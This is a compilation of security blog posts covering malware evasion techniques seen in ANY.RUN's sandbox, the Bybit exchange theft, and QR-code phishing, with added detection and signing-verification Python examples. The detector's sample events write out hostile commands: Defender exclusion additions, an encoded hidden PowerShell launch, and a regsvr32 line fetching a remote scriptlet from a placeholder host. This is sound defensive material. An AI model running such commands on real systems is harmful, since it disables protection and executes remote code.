5 Common Evasion Techniques in Malware 

Cybercriminals are constantly refining their methods to stay one step ahead of security defenses. One of their key tactics is evasion, a set of techniques designed to hide malicious activity, bypass detection, and make investigations much more difficult for security teams. 

Over time, attackers have developed countless evasion techniques, and they continue to evolve as cybersecurity measures improve. Some methods exploit trusted system processes, while others rely on cleverly disguising malicious code to slip past defenses unnoticed. 

Let’s take a closer look at some of the most commonly used evasion techniques and see how they play out in real-world scenarios inside our secure sandbox, helping businesses detect threats faster, strengthen defenses, and minimize security risks before they cause damage. 

What You Should Know About Evasion Techniques 

When you’re defending your company’s network, one of the trickiest things you’ll face is attackers using evasion techniques. These are deliberately designed to stay under your radar, hiding malware and suspicious activity from detection tools and making incident response even tougher. 

Cybercriminals use evasion techniques to:
  • Avoid detection by security tools and analysts.
  • Extend dwell time inside compromised networks.
  • Increase the success rate of malware delivery.
  • Make investigations more challenging for security teams.
  • Reduce the risk of their operations being uncovered.
  • Enhance persistence and maintain long-term access to systems.

Knowing how these evasion tactics work can help your security team spot threats sooner, respond faster, and avoid major disruptions to your business. 

How Attackers Stay Hidden: Key Evasion Techniques 

Let’s have a look at some of the most commonly used evasion techniques and how they work in real-world attacks: 

1. T1027.003: Steganography 

Steganography is a way of hiding malicious data inside harmless-looking carrier files, most often images. Unlike encryption, which openly scrambles data to make it unreadable, steganography is about not being noticed at all. 

With this technique, attackers embed a payload inside images nobody would suspect. Because the image still opens and looks normal, and image files are something most scanners do not dissect, the hidden code tends to slip past signature-based detection. That is exactly why steganography has become such a popular method for quietly moving payloads past your defenses. 

By analyzing suspicious files in ANY.RUN’s interactive sandbox, you can quickly uncover hidden threats and figure out exactly what techniques attackers are using. 

Let’s walk through a real-world example and see, step by step, how to spot steganography quickly. 

View analysis session 

Steganography campaign starting with a phishing PDF 

In this analysis session, attackers used a phishing PDF to trick users into downloading a malicious registry file.  

Once executed, the file added an autorun value to the system registry so that a hidden script launches on every reboot. 

Autorun value change in the registry detected by ANY.RUN 

Once the system restarts, a registry entry quietly triggers PowerShell to download a VBS script from a remote server. In ANY.RUN’s sandbox, you can easily track this action by inspecting the PowerShell process from the right side of the screen. 

Powershell.exe downloading a VBS file inside a secure environment 

Next, the downloaded script fetches a regular-looking image file, which secretly contains a hidden DLL payload.  

Image with malicious DLL payload detected by ANY.RUN  

With ANY.RUN, you can quickly pinpoint exactly where the malware hides within the file. By exposing hidden payloads like XWorm, security teams can accelerate threat detection, reduce incident response time, and prevent costly breaches before they escalate. 

Inspecting the image’s HEX data reveals a clear marker (<<BASE64_START>>) followed by Base64-encoded executable code, confirming the use of steganography to conceal the malicious XWorm payload. In this variant the payload is simply appended to the image as text rather than hidden in the pixel data: most image viewers ignore anything after the end-of-image marker, so the picture still displays normally, while the loader script only needs to find the marker and decode what follows it. 

Static analysis of the malicious image 

When extracted, the hidden malware deploys XWorm, granting attackers remote control over the infected system. 


2. T1562.001: Disable or Modify Tools 

Cybercriminals often attempt to disable or interfere with security software to ensure their malicious activities go unnoticed. By disrupting or modifying security tools, attackers can prevent detection, maintain ongoing access, and carry out their goals without interruption. 

They might achieve this by terminating antivirus processes, altering registry settings, or adding exclusions so their malware bypasses scanning entirely. Exclusion changes are worth alerting on: Windows Defender records configuration changes, including new exclusions, as Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, and the exclusions themselves are stored under HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions. 

View analysis session with T1562.001 technique 

Adding an extension to the Windows Defender exclusion list 

In an analysis session conducted in the ANY.RUN sandbox, cybercriminals specifically targeted Windows Defender.  

They used sihost.exe (PID 2420), which appears as a legitimate system process, to quietly add file extensions to Windows Defender’s exclusion list. This prevented the security software from scanning certain malicious files, allowing the attacker’s payload to execute without being flagged. Whenever a system-named process does something like this, check its image path and signature: the genuine sihost.exe lives in C:\Windows\System32, is Microsoft-signed, and has no business editing Defender exclusions. 

Sihost.exe with its conducted processes 

You can also view the full map of MITRE ATT&CK techniques related to any analysis session. This gives security teams instant clarity on attack tactics, helping businesses speed up investigations. 

Simply click the “ATT&CK” button in the upper-right corner inside ANY.RUN to learn more about specific evasion techniques. 

MITRE ATT&CK Matrix techniques displayed inside ANY.RUN sandbox 

 
3. T1140: Deobfuscate/Decode Files or Information 

Attackers often conceal their malware using encoding or obfuscation methods to avoid detection. One common technique is encoding malicious payloads in Base64, turning recognizable code into what appears as harmless, random text. This method helps attackers bypass traditional security tools that might otherwise flag suspicious files or scripts. 

When the malware reaches the victim’s system, it gets decoded or deobfuscated back into executable form, allowing the attack to continue undetected. Because encoded data initially looks innocent, standard security scans often miss these threats entirely, giving cybercriminals the opportunity to quietly deliver and execute their malware. 


Attackers commonly use several methods to obfuscate or encode malicious files, including: 

  • Base64 encoding: Converts malware into text strings that seem harmless and difficult to detect. 
  • Encryption: Scrambles the payload, making it unreadable without a specific key. 
  • Compression: Reduces file size and disguises malicious code, making detection harder. 
  • String Obfuscation: Breaks recognizable text or commands into fragmented, obscure parts. 
  • Packing: Embeds malware within compressed or protected executables that unpack at runtime. 
  • Script Obfuscation: Uses complex or confusing scripts to hide malicious intent. 
  • Character Substitution: Replaces clear commands or URLs with unusual or encoded characters to evade simple scans. 

View analysis session with T1140 technique 

Decoding of a binary file from Base64 detected by ANY.RUN 

In this ANY.RUN analysis session, the attackers used exactly this method: the process with PID 1164 decoded a malicious binary file from Base64.  

Using ANY.RUN’s Script Tracer feature, analysts can immediately see the decoded content, revealing the previously hidden activity so that security teams can respond faster and prevent further compromise. 

Script Tracer revealing the decoded content 
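The two cases above, the Base64 payload appended after the <<BASE64_START>> marker in an image and a binary decoded from Base64 inside a script, can both be carved with the same logic: find Base64 runs (marker-delimited or free-standing), decode them strictly, and keep only those that decode to a PE file. The following Python is an added example and is not code from the ANY.RUN post or its tooling; the <<BASE64_END>> marker, the fake PE stand-in, the PNG-shaped bytes and the PowerShell loader text are all constructed for the demonstration.

```python
import base64
import hashlib
import re
import struct

START_MARKER = b"<<BASE64_START>>"   # marker observed in the analysed image
END_MARKER = b"<<BASE64_END>>"       # assumed closing marker; used only if present
# Free-standing Base64 runs: ignore anything shorter than 200 chars (~150 bytes) to cut noise.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")


def looks_like_pe(data):
    """True if data starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def decode_b64(text):
    """Strict Base64 decode after stripping whitespace and repairing missing padding."""
    text = re.sub(rb"\s+", b"", text)
    text += b"=" * (-len(text) % 4)
    try:
        return base64.b64decode(text, validate=True)
    except ValueError:
        return None


def carve_payloads(blob):
    """Return one record per embedded PE: offset of the Base64 text, how it was
    found ('marker' or 'run'), decoded size and SHA-256 of the decoded bytes."""
    findings, covered = [], []

    def consider(start, end, kind):
        decoded = decode_b64(blob[start:end])
        if decoded and looks_like_pe(decoded):
            findings.append({"offset": start, "kind": kind, "size": len(decoded),
                             "sha256": hashlib.sha256(decoded).hexdigest()})
            covered.append((start, end))

    # Pass 1: Base64 that directly follows the marker (until END_MARKER or a non-Base64 byte).
    pos = 0
    while True:
        idx = blob.find(START_MARKER, pos)
        if idx == -1:
            break
        start = idx + len(START_MARKER)
        stop = blob.find(END_MARKER, start)
        region = blob[start:stop] if stop != -1 else blob[start:]
        m = re.match(rb"[A-Za-z0-9+/=\r\n]+", region)
        if m:
            consider(start, start + m.end(), "marker")
        pos = start

    # Pass 2: any other long Base64 run (e.g. a script's FromBase64String argument).
    for m in B64_RUN.finditer(blob):
        if any(s <= m.start() < e for s, e in covered):
            continue
        consider(m.start(), m.end(), "run")
    return findings


def fake_pe(size):
    """Constructed stand-in for a DLL: an MZ stub with e_lfanew -> 'PE\\0\\0'. Not runnable code."""
    hdr = bytearray(0x80)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)
    return bytes(hdr) + b"PE\0\0" + b"\xCC" * (size - 0x84)


# Constructed samples: a PNG-shaped file with the payload appended after the marker,
# a PowerShell loader carrying a payload plus a harmless Base64 string, and a benign blob.
SAMPLE_IMAGE = (b"\x89PNG\r\n\x1a\n" + b"\x00" * 64 + b"IEND\xaeB`\x82"
                + START_MARKER + base64.b64encode(fake_pe(600)))
SAMPLE_SCRIPT = (b'$b = [Convert]::FromBase64String("' + base64.b64encode(fake_pe(700))
                 + b'")\n$t = "' + base64.b64encode(b"A" * 300) + b'"\n')
SAMPLE_BENIGN = base64.b64encode(b"A" * 300)

if __name__ == "__main__":
    for name, blob in (("image.png", SAMPLE_IMAGE), ("loader.ps1", SAMPLE_SCRIPT), ("benign", SAMPLE_BENIGN)):
        print(name, carve_payloads(blob))
```

The PE check is what keeps the false-positive rate tolerable: long Base64 runs are everywhere (certificates, embedded fonts, images in HTML), but very few of them decode to something with an MZ header and a valid e_lfanew. Run the carver over the dropped image and over the loader script and compare the SHA-256 of what it recovers with the DLL the sandbox observed being loaded.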

4. T1564.003: Hidden Window 

Attackers often use hidden windows to quietly carry out malicious activities without users noticing. Normally, when an application runs, it opens a visible window, alerting users to its presence. However, cybercriminals leverage built-in system and scripting features to hide these windows, making their actions virtually invisible. 

Common methods attackers use include: 

  • PowerShell Commands: Using commands like powershell.exe -WindowStyle Hidden to execute scripts without displaying a window (powershell.exe accepts unambiguous parameter prefixes, so -w hidden or -win hidden do the same and are common in malicious command lines). 
  • Visual Basic and JScript: Employing script functions designed to launch processes silently in the background, such as the WScript.Shell Run method with window style 0. 
  • Hidden Startup Processes: Configuring malware to run silently upon system reboot, with no visible window or notification. 
  • macOS plist Manipulation: Editing macOS property list (plist) files to prevent apps from appearing visibly in the dock, thus hiding malicious activities. 

View analysis session with T1564.003 technique 

T1564.003 evasion technique detected inside ANY.RUN sandbox 

In a real-world ANY.RUN sandbox analysis, attackers executed PowerShell with an invisible window to conceal malicious activity. Specifically, they ran the following command: 

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "<malicious_script>" 

Note that the command line itself carries no -WindowStyle Hidden switch: a parent process can create its child with the window already hidden (a script host launching it with window style 0, for instance), so the hidden window is something the sandbox observes from the process itself rather than from its arguments. The command executes without any visual indicator. The script then attempts to disable Windows Defender by downloading and executing a batch file (source.bat) in the background.  

Next, it downloads a rootkit named MasonRootkit.exe from a remote GitHub repository and launches it silently, either with elevated privileges (RunAs) or as a regular user, depending on the conditions set in the script. 

Dangerous activity detected inside ANY.RUN VM 

Because the entire process happens invisibly, most users see no unusual windows or alerts. Security teams using ANY.RUN can quickly uncover such hidden activities by examining detailed process execution logs and script behaviors, helping companies promptly respond to and mitigate the threat. 

5. T1218.010: Regsvr32 

Cybercriminals frequently misuse trusted system utilities like Regsvr32.exe to quietly execute malicious DLL payloads. Since Regsvr32 is a legitimate, Microsoft-signed Windows tool normally used to register DLLs, and is often allow-listed, its misuse tends to go unnoticed by antivirus and application-control software. The /s switch suppresses its dialogs, and with /i:<URL> plus scrobj.dll it can even fetch and run a remote scriptlet (the “Squiblydoo” technique), which is why it appears so often in application-control bypasses. 

Attackers exploit this built-in utility to: 

  • Silently execute malicious DLL files. 
  • Evade application control policies and antivirus detections. 
  • Maintain stealthy persistence on compromised systems. 

View analysis session with T1218.010 technique 

Execution of malicious DLL payload 

In this analysis session conducted in the ANY.RUN sandbox, the victim installed the application ManyCam, which dropped a suspicious DLL file (VideoSrcvbm.dll) into its program directory. 

The attackers then leveraged the trusted Windows utility Regsvr32.exe to execute this DLL silently: 

regsvr32 /s "C:\Program Files (x86)\ManyCam\Bin\VideoSrcvbm.dll" 

Regsvr32 does this by loading the DLL and calling its exported DllRegisterServer function, which can contain arbitrary code; the /s switch suppresses the result dialog. 

Suspicious DLL file dropped  

Because this DLL execution used the legitimate Regsvr32.exe tool, it avoided standard security detections, allowing attackers to maintain stealth and persist unnoticed. When triaging such an event, look at what Regsvr32 is asked to load rather than at Regsvr32 itself: a DLL outside the Windows directories, an unsigned DLL, or a /i: argument pointing at a URL are the signals worth alerting on. 
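The three command-line-driven techniques above (T1562.001, T1564.003 and T1218.010) can be triaged from process-creation telemetry such as Sysmon Event ID 1 or Windows Security Event 4688 with command-line auditing enabled. The following Python is an added example, not ANY.RUN’s detection logic; the events are constructed, reusing the two command lines quoted above (the PowerShell one verbatim in one event and with an added -WindowStyle Hidden switch in another), and the severity scheme, path lists and event names are assumptions. Note what the verbatim PowerShell command line shows: it produces no hit, because the hidden window was set by the parent process, not by an argument, so command-line rules alone miss that case.

```python
import re

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\", "\\downloads\\")

# -WindowStyle Hidden and its prefixes (-w hidden, -win hidden, ...): powershell.exe accepts
# any unambiguous prefix of a parameter name.
HIDDEN_WINDOW = re.compile(r"(?<![\w-])-w[a-z]*\s+hidden\b", re.I)
# Defender tampering via PowerShell cmdlets, MpCmdRun or direct writes to the Exclusions key.
DEFENDER_TAMPER = re.compile(
    r"Add-MpPreference\s.*-Exclusion"
    r"|Set-MpPreference\s.*-Disable"
    r"|MpCmdRun(\.exe)?\s.*-RemoveDefinitions"
    r"|Windows Defender\\Exclusions", re.I)


def tokens(cmdline):
    """Split a Windows command line into arguments, honouring double quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(event):
    """Return [(technique, severity, reason)] for one process-creation event."""
    cmd, img = event["cmdline"], basename(event["image"])
    hits = []
    if img in ("powershell.exe", "pwsh.exe") and HIDDEN_WINDOW.search(cmd):
        hits.append(("T1564.003", "medium", "PowerShell started with a hidden window"))
    if DEFENDER_TAMPER.search(cmd):
        hits.append(("T1562.001", "high", "Defender exclusion added or protection disabled"))
    if img == "regsvr32.exe":
        args = tokens(cmd)[1:]
        switches = [a.lower() for a in args if a.startswith(("/", "-"))]
        targets = [a for a in args if not a.startswith(("/", "-"))]
        if any(s.startswith(("/i:http", "-i:http")) for s in switches) or \
                any(basename(t) == "scrobj.dll" for t in targets):
            hits.append(("T1218.010", "high", "regsvr32 loading a remote scriptlet via scrobj.dll"))
        for t in targets:
            low = t.lower()
            if low.startswith(SYSTEM_DIRS):
                continue  # DLLs under System32/SysWOW64: routine registrations
            if any(mark in low for mark in USER_WRITABLE):
                hits.append(("T1218.010", "high", "regsvr32 loading a DLL from a user-writable path: " + t))
            elif "\\" in low:
                # Program Files is where installers legitimately register DLLs, so this is
                # a review item, not an alert: check the DLL's signature and the parent process.
                hits.append(("T1218.010", "review", "regsvr32 loading a DLL outside the Windows directories: " + t))
    return hits


def triage_all(events):
    return {e["name"]: triage(e) for e in events}


# Constructed process-creation events (names, paths and the -enc blob are made up).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"name": "ps_hidden_flag", "image": PS,
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "<malicious_script>"'},
    {"name": "ps_page_verbatim", "image": PS,
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "<malicious_script>"'},
    {"name": "ps_hidden_short", "image": PS,
     "cmdline": r"powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"name": "add_exclusion", "image": PS,
     "cmdline": r'powershell.exe -Command "Add-MpPreference -ExclusionExtension .exe,.dll"'},
    {"name": "reg_exclusion", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\Users\Public /t REG_DWORD /d 0'},
    {"name": "regsvr32_manycam", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32 /s "C:\Program Files (x86)\ManyCam\Bin\VideoSrcvbm.dll"'},
    {"name": "regsvr32_squiblydoo", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s /n /u /i:http://example.invalid/payload.sct scrobj.dll"},
    {"name": "regsvr32_system", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Windows\System32\msxml3.dll"},
    {"name": "ps_benign", "image": PS, "cmdline": r"powershell -NoProfile -Command Get-Date"},
]

if __name__ == "__main__":
    for name, hits in triage_all(SAMPLE_EVENTS).items():
        print(name, hits or "-")
```

The rules key on the target (what Regsvr32 loads, what the cmdlet changes) rather than on the presence of the signed binary, which is exactly what a blanket "regsvr32 ran" alert gets wrong. Pair them with Defender Event ID 5007 for the exclusion case and with window-state data from a sandbox or EDR for the hidden-window case.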

Quick Detection of Evasion Techniques with ANY.RUN 

As we can see, one of the fastest ways to uncover evasion techniques is by analyzing suspicious files using the ANY.RUN sandbox.  

Within seconds, ANY.RUN visually maps the complete attack flow, clearly displaying all relevant MITRE ATT&CK tactics and techniques involved. This helps security teams quickly understand attack patterns, prioritize threats, and make faster, data-driven response decisions to protect business assets. 

To quickly understand the techniques used in a particular attack: 

  • Open your analysis session in the ANY.RUN sandbox. 
  • Click on the “ATT&CK” button located in the upper-right corner. 
  • Instantly view a detailed map of the attacker’s tactics and techniques. 
  • Click any technique for an in-depth explanation, additional context, and deeper insights. 

Conclusion 

Cybercriminals continuously refine their evasion tactics, making threat detection and response harder. Techniques like steganography, disabling security tools, script obfuscation, hidden windows, and Regsvr32 abuse allow attackers to bypass defenses and maintain access. 

For businesses and security teams, recognizing these tactics is important to protect sensitive data, maintain compliance, and prevent costly breaches. Without clear visibility into attacker methods, organizations risk financial loss, reputational damage, and prolonged intrusions. 



ANY.RUN’s interactive sandbox gives you the real-time visibility you need to detect even the most advanced evasion techniques. Within seconds, you can: 

  • See the full attack flow mapped with MITRE ATT&CK techniques. 
  • Analyze suspicious files in an isolated environment without risk to your network. 
  • Detect hidden threats that traditional security tools might miss. 
  • Get instant insights to improve response times and mitigate risks. 
  • Generate well-structured reports with IOCs and key findings, making it easy to share crucial threat intelligence with your team. 

About ANY.RUN

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

Request trial of ANY.RUN’s services for your company → 

The post 5 Common Evasion Techniques in Malware  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – Read More

How to store cryptocurrency after the Bybit hack | Kaspersky official blog

February 21 was a dark day for the crypto market as it suffered the largest heist in its history. Attackers made off with around $1.5 billion from Bybit, the world’s second-largest crypto exchange, with experts citing it as the biggest theft – of anything – of all time. Although neither this loss nor the withdrawal of a further $5 billion by panicked investors were fatal for Bybit, the incident underscores the fundamental flaws in the modern crypto ecosystem, and serves up some valuable lessons for regular users.

How Bybit was robbed

Like all major crypto exchanges, Bybit secures stored cryptocurrency with multi-layered protection. Most funds are stored in cold wallets disconnected from online systems. When current assets need topping up, the required sum is manually moved from the cold wallet to the hot one, and the operation is signed by several employees at once. For this, Bybit uses a multi-signature (multisig) solution from Safe{Wallet}, and each employee involved in the transaction signs it using a private Ledger hardware cryptokey.

The attackers studied the system in detail and, according to independent researchers, compromised a Safe{Wallet} developer machine. Presumably, malicious modifications were made to the code for displaying Safe{Wallet} web application pages. But the logic bomb inside it was triggered only if the transaction source matched the Bybit contract address — otherwise Safe{Wallet} worked as usual. Having conducted their own investigation, the owners of Safe{Wallet} rejected the findings of the two independent information security companies, insisting that their infrastructure had not been hacked.

So what happened? During a routine top-up of $7 million to a hot wallet, Bybit employees saw on their computer screens exactly this amount and a recipient address that matched the hot wallet. But different data was sent for signing! For regular transfers, the recipient’s address can (and should!) be checked on the screen of the Ledger device. When signing multisig transactions, however, the device does not show the decoded recipient; it typically displays only hashes of the transaction data, which no human can check against an intended address. So the Bybit employees were effectively blind-signing.

As a result, they inadvertently green-lighted a malicious smart contract that moved the entire contents of one of Bybit’s cold wallets to several hundred fake wallets. As soon as the withdrawal from the Bybit wallet was complete, it appears that the code on the Safe{Wallet} website reverted to the harmless version. The attackers are currently busy “layering” the stolen Ethereum — transferring it piecemeal in an attempt to launder it.

By the looks of it, Bybit and its clients were the victims of a targeted supply-chain attack.
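The failure above is a what-you-see-is-not-what-you-sign problem: the UI showed one transfer, the wallet signed another. The minimum defence is to decode the bytes actually submitted for signing and compare them with the displayed intent before any key touches them. The following Python is an added illustration and is not Bybit’s, Safe{Wallet}’s or Ledger’s code; it uses an ERC-20 transfer(address,uint256) call as a hypothetical stand-in for the real transaction, and all addresses and amounts are constructed. The Safe-style operation field (0 = CALL, 1 = DELEGATECALL) is included because a routine top-up never needs delegatecall.

```python
# Known 4-byte function selectors (first 4 bytes of keccak256 of the signature).
SELECTORS = {
    "a9059cbb": ("transfer", ("address", "uint256")),
    "095ea7b3": ("approve", ("address", "uint256")),
}
CALL, DELEGATECALL = 0, 1   # Safe-style operation field


def _strip0x(h):
    return h[2:] if h[:2].lower() == "0x" else h


def decode_calldata(calldata_hex):
    """Decode ABI-encoded calldata for the selectors above; raise ValueError on anything
    else, because data that cannot be decoded cannot be clear-signed either."""
    data = bytes.fromhex(_strip0x(calldata_hex))
    selector = data[:4].hex()
    if selector not in SELECTORS:
        raise ValueError("unknown function selector 0x" + selector)
    name, types = SELECTORS[selector]
    if len(data) != 4 + 32 * len(types):
        raise ValueError("unexpected calldata length for " + name)
    args = []
    for i, t in enumerate(types):
        word = data[4 + 32 * i: 36 + 32 * i]
        if t == "address":
            if any(word[:12]):
                raise ValueError("address word has non-zero upper bytes")
            args.append("0x" + word[12:].hex())
        else:
            args.append(int.from_bytes(word, "big"))
    return name, args


def encode_transfer(to, amount):
    """ABI-encode transfer(address,uint256); used here only to build the samples."""
    return "0xa9059cbb" + _strip0x(to).lower().rjust(64, "0") + format(amount, "064x")


def verify_intent(displayed, request):
    """Compare what the UI displayed (token, to, amount) with what is actually submitted
    for signing (to = contract called, data = calldata, operation).
    Returns (ok, reasons); any reason means: do not sign."""
    reasons = []
    if request.get("operation", CALL) != CALL:
        reasons.append("operation is DELEGATECALL; a token transfer never needs it")
    if request["to"].lower() != displayed["token"].lower():
        reasons.append("called contract %s is not the displayed token %s" % (request["to"], displayed["token"]))
    try:
        name, (recipient, amount) = decode_calldata(request["data"])
    except ValueError as err:
        return False, reasons + ["cannot decode calldata, refuse to blind-sign: %s" % err]
    if name != "transfer":
        reasons.append("function is %s, not transfer" % name)
    if recipient.lower() != displayed["to"].lower():
        reasons.append("recipient %s differs from displayed %s" % (recipient, displayed["to"]))
    if amount != displayed["amount"]:
        reasons.append("amount %d differs from displayed %d" % (amount, displayed["amount"]))
    return not reasons, reasons


# Constructed sample: a 7,000,000-unit top-up (6-decimal token) of a hot wallet.
TOKEN = "0x" + "aa" * 20
HOT_WALLET = "0x" + "bb" * 20
ATTACKER = "0x" + "cc" * 20
DISPLAYED = {"token": TOKEN, "to": HOT_WALLET, "amount": 7_000_000 * 10**6}
HONEST_REQUEST = {"to": TOKEN, "data": encode_transfer(HOT_WALLET, DISPLAYED["amount"]), "operation": CALL}
# The UI still shows DISPLAYED, but the bytes sent for signing differ:
SWAPPED_RECIPIENT = {"to": TOKEN, "data": encode_transfer(ATTACKER, DISPLAYED["amount"]), "operation": CALL}
DELEGATECALL_REQUEST = {"to": "0x" + "dd" * 20, "data": "0x" + "de" * 36, "operation": DELEGATECALL}

if __name__ == "__main__":
    for label, req in (("honest", HONEST_REQUEST), ("swapped", SWAPPED_RECIPIENT),
                       ("delegatecall", DELEGATECALL_REQUEST)):
        print(label, verify_intent(DISPLAYED, req))
```

The point of the design is that the comparison runs on the signing side against an independently held intent, not on data the front end hands over; if the same compromised web page produces both the display and the bytes, there is nothing to compare. That is the property a hardware wallet screen gives you for a plain transfer and that blind-signing a hash takes away.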

The Bybit case is no one-off

The FBI has officially named a North Korean group codenamed TraderTraitor as the perpetrator. In information-security circles, this group is also known as Lazarus, APT38, or BlueNoroff. Its trademark style is persistent, sophisticated and sustained attacks in the cryptocurrency sphere: hacking wallet developers, robbing crypto exchanges, stealing from ordinary users, and even making fake play-to-earn games.

Before the Bybit raid, the group’s record was the theft of $540 million from the Ronin Network blockchain, created for the game Axie Infinity. In that 2022 attack, hackers infected the computer of one of the game’s developers using a fake job offer in an infected PDF file. This social engineering technique remains in the group’s arsenal to this day.

In May 2024, the group pulled off a smash-and-grab of over $300 million from Japanese crypto-exchange DMM Bitcoin, which went bankrupt as a consequence. Before that, in 2020, more than $275 million was siphoned off the KuCoin crypto exchange, with a “leaked private key” for a hot wallet cited as the reason.

Lazarus has been honing its cryptocurrency theft tactics for over a decade now. In 2018, we wrote about a string of attacks on banks and crypto exchanges using a Trojanized cryptocurrency trading app as part of Operation AppleJeus. Experts at Elliptic estimate that North-Korea-linked actors’ total criminal earnings amount to around $6 billion.

What crypto investors should do

In the case of Bybit, clients were lucky: the exchange promptly serviced the wave of withdrawal requests that ensued, and promised to compensate losses from its own funds. Bybit remains in business, so clients don’t need to take any particular action.

But the hack demonstrates once again just how hard it is to secure funds flowing through blockchain systems, and how little can be done to cancel a transaction or refund money. Given the unprecedented scale of the attack, many have called for the Ethereum blockchain to be rolled back to its pre-hack state, but Ethereum developers consider this “technically intractable”. Meanwhile, Bybit has announced a bounty program for crypto exchanges and ethical researchers to the tune of 10% of any funds recovered, but so far only $43 million has materialized.

This has caused some crypto industry experts to speculate that the main fallout from the hack will be a rise in self-custody of crypto assets.

Self-custody shifts the responsibility for secure storage from the shoulders of specialists to your own. Therefore, only go down this route if you have total confidence in your abilities to master all security measures and follow them rigidly day by day. Note that regular users without cryptowallet millions are unlikely to face a sophisticated attack targeted specifically at them, while generic mass attacks are easier to deflect.

So, what do you need for secure self-custody of cryptocurrency?

  • Buy a hardware wallet with a screen. This is the most effective way to protect crypto assets. Do a little research first, and be sure to buy a wallet from a reputable vendor — and directly: never second-hand or from a marketplace. Otherwise, you might get a pre-hacked wallet that swallows up all your funds. When using a wallet to sign transfers, always check the recipient’s address on both the computer screen and the wallet screen to rule out its substitution by a malicious smart contract or a clipper Trojan that replaces cryptowallet addresses in the clipboard.
  • Never store wallet seed phrases in electronic form. Forget about using files on your computer and photos in your gallery for that — modern Trojans have learned to infiltrate Google Play and the App Store and recognize data in photos stored on your smartphone. Only paper records (or metal engravings, if you prefer) kept inside a safe or in another physically secure place, protected from both unauthorized access and natural disasters, will do. You might consider multiple storage locations, as well as splitting your seed phrase into parts.
  • Don’t keep all your coins in one basket. For holders of large amounts or different types of crypto assets, it makes sense to use multiple wallets. Small amounts for transactional needs can be stored on a crypto exchange, while the bulk can be divided among several hardware cryptowallets.
  • Use a dedicated computer. If possible, dedicate a computer for cryptocurrency transactions. Physically restrict access to it (e.g., put it in a safe, a locked cupboard or locked room), use disk encryption and password login, and have a separate account with its own passwords (i.e., different to those on your main computer). Install reliable protection and enable maximum security settings on your “crypto-computer”. Connect it to the internet only for transactions, and use it solely for operations with wallets. Playing games, reading crypto news, and chatting with friends are for another device.
  • If dedicating a computer is impractical or uneconomical, maintain strict digital hygiene on your main computer. Set up a separate account with low privileges (non-administrator) for crypto operations, and another account — also non-administrator — for work, chat and games. There’s no need to work in administrator mode at all, except to update the system software or significantly reconfigure the computer. Sign in to your dedicated “crypto account” only for operations with wallets, and sign out immediately afterward. Don’t give outsiders access to the computer, and don’t share admin passwords with anyone.
  • Take care when choosing cryptowallet software. Carefully study the software’s description, make sure that the application has been on the market for a long time, and check that you’re downloading it from the official website, and that the digital signature of the distribution corresponds to the website and the name of the vendor. Perform a deep scan of your computer with an up-to-date security solution before installing and running cryptowallet software.
  • Be careful with updates. While we usually recommend updating all software right away, in the case of cryptocurrency applications, it’s worth adjusting this policy a little. After the release of a new version, wait about a week and read the reviews before installing it. This will give the community time to catch any bugs or Trojans that may have sneaked into the update.
  • Follow the enhanced computer security measures described in our post Protecting crypto investments: four key steps to safety, which include installing a powerful security solution, such as Kaspersky Premium, on your computer and smartphone, regularly updating your operating system and browsers, and using strong, unique passwords.
  • Expect phishing. Cryptocurrency fraud can be both multifaceted and sophisticated, so any unexpected messages by email, messenger app and the like should be seen as the start of a scam. Keep on top of all the latest crypto scams by following our blog or Telegram channel, as well as other reputable cybersecurity sources.

Read more about crypto scams and ways to protect yourself in our dedicated posts:

Kaspersky official blog – Read More

Technology to check QR codes for phishing | Kaspersky official blog

In an attempt to bypass security solutions, attackers are increasingly hiding phishing and other malicious links inside QR codes. It’s for this reason that we’ve added a technology to Kaspersky Secure Mail Gateway that reads QR codes (including ones hidden inside PDF files), extracts links and checks them before they land in an employee’s inbox. We explain how it works.

Example of a phishing QR code inside a PDF file

Why do attackers use QR codes?

Ever since even basic security tools learned to check phishing links effectively enough, attackers have been inventing ways to hide them from scanners. The most commonly employed trick is to post links on third-party services; that way, victims don’t receive an email directly from the attackers, but a notification from some legitimate site where a document with a malicious link is already placed. While such ploys work well on home users, with company employees the success rate is far lower. That’s because any self-respecting organization these days has equipped all its work computers with security software that catches redirects to phishing sites.

Therefore, attackers have turned their attention to QR codes. First, this technology obligingly transforms regular URLs into something incomprehensible to standard systems that check links for malicious intent. Second, QR codes are common enough for people to scan them without a second thought. And third and most important, people overwhelmingly scan QR codes with a phone or tablet that may not have a security solution with anti-phishing technology – especially if it’s a personal, not work, device.

